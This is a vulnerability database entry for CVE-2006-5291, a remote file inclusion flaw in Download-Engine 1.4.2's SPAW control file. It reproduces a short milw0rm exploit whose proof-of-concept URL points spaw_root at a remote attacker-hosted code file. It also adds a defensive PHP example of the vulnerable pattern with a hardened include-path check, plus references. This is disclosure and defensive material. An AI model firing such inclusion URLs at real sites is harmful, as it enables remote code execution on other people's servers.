Alex DownloadEngine 'admin/includes/spaw/spaw_control.class.ph' Spaw_Root parameter remote file inclusion vulnerability

Vulnerability ID: 1193203    Vulnerability type: Code injection
Published: 2006-10-16    Updated: 2006-11-30
CVE: CVE-2006-5291    CNNVD-ID: CNNVD-200610-220
Platform: N/A    CVSS score: 7.5
|Source
https://cxsecurity.com/issue/WLB-2006100087
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-220
|Details
The file admin/includes/spaw/spaw_control.class.php in Download-Engine 1.4.2 contains a PHP remote file inclusion vulnerability: a remote attacker can execute arbitrary PHP code by supplying a URL in the spaw_root parameter.
|Exploit
#======================================================================================
#  Download-Engine Remote File Include
#======================================================================================
# Info:-
#
# Scripts: Download-Engine
# Download: http://www.alexscriptengine.de/v2/dl_engine/redirect.php?dlid=50&ENGINEsessID=4754ee8243de5f333ec74272f249b649
# Version : 1.4.2
# Dork & vuln : download scripts and think :)
# Note : only this version affected :)
#======================================================================================
#Exploit :
#
#http://localhost/path/admin/includes/spaw/spaw_control.class.php?spaw_root=http://EvElCoDe.txt?
#
#======================================================================================
#Discovered By : v1per-haCker
#
#Contact : v1per-hacker[at]hotmail.com
#
#XP10_hackEr Team
#
#Greetz to :
#abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL |  ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net | metoovet
#
#
#And All Members In XP10_hackEr Team
#Thanx to str0ke :)
#                        [WWW.XP10.COM]
#======================================================================================
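The bug described above is the classic register_globals remote file inclusion: an include path is built from a variable the file never initialises, so a request parameter can supply it. As an added defensive illustration (not code from SPAW or Download-Engine; the function names are mine), the vulnerable pattern sits next to a hardened form that takes its base directory from the file's own location and validates any path fragment that legitimately comes from configuration.

```php
<?php
// Added illustration, not SPAW's or Download-Engine's real source.
// Vulnerable pattern: $spaw_root is never initialised in this file. With
// register_globals=On (PHP < 5.4) a ?spaw_root=... request parameter
// pre-populates it, and with allow_url_include=On include_once() fetches
// and executes whatever that URL returns.
function vulnerable_include(): void
{
    global $spaw_root;
    include_once $spaw_root . 'config/spaw_control.config.php';
}

// Hardened: the base directory comes from where this file lives, so no
// request data can influence where include_once() looks.
function spaw_base_dir(): string
{
    return __DIR__ . DIRECTORY_SEPARATOR;
}

// For a fragment that legitimately comes from configuration, reject URL
// schemes (http://, ftp://, php://, data:), NUL bytes and traversal, and
// require the resolved path to stay inside the base directory.
function is_safe_include_path(string $base, string $fragment): bool
{
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $fragment) === 1) {
        return false;
    }
    if (strpos($fragment, "\0") !== false || strpos($fragment, '..') !== false) {
        return false;
    }
    $realBase = realpath($base);
    $real     = realpath($base . $fragment);
    return $realBase !== false && $real !== false
        && strncmp($real, $realBase . DIRECTORY_SEPARATOR, strlen($realBase) + 1) === 0;
}

// Hypothetical replacement for the vulnerable include: the base is fixed,
// the fragment is checked, and anything that fails the check is refused.
function hardened_include(string $fragment): void
{
    $base = spaw_base_dir();
    if (!is_safe_include_path($base, $fragment)) {
        http_response_code(400);
        exit('invalid include path');
    }
    include_once $base . $fragment;
}
```

Independently of the code, register_globals=Off and allow_url_include=Off in php.ini close this bug class for the whole server, which is why the exploit above notes that only the affected version and configuration are exposed.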
|References

Source: XF
Name: downloadengine-spaw-file-include(29493)
Link: http://xforce.iss.net/xforce/xfdb/29493
Source: BID
Name: 20500
Link: http://www.securityfocus.com/bid/20500
Source: BUGTRAQ
Name: 20061012 Download-Engine Remote File Include
Link: http://www.securityfocus.com/archive/1/archive/1/448450/100/0/threaded
Source: MILW0RM
Name: 2521
Link: http://www.milw0rm.com/exploits/2521
Source: VUPEN
Name: ADV-2006-4025
Link: http://www.frsirt.com/english/advisories/2006/4025
Source: MISC
Link: http://spaw.cvs.sourceforge.net/spaw/spaw/spaw_control.class.php?r1=1.25&r2=1.26
Source: MISC
Link: http://spaw.cvs.sourceforge.net/spaw/spaw/spaw_control.class.php?r1=1.19&r2=1.20
Source: spaw.cvs.sourceforge.net
Link: http://spaw.cvs.sourceforge.net/spaw/spaw/docs/ChangeLog.txt?view=markup
Source: SECUNIA
Name: 22383
Link: http://secunia.com/advisories/22383
Source: SREASON
Name: 1723
Link: http://securityreason.com/securityalert/1723
Source: MILW0RM
Name: 2521
Link: http://milw0rm.com/exploits/2521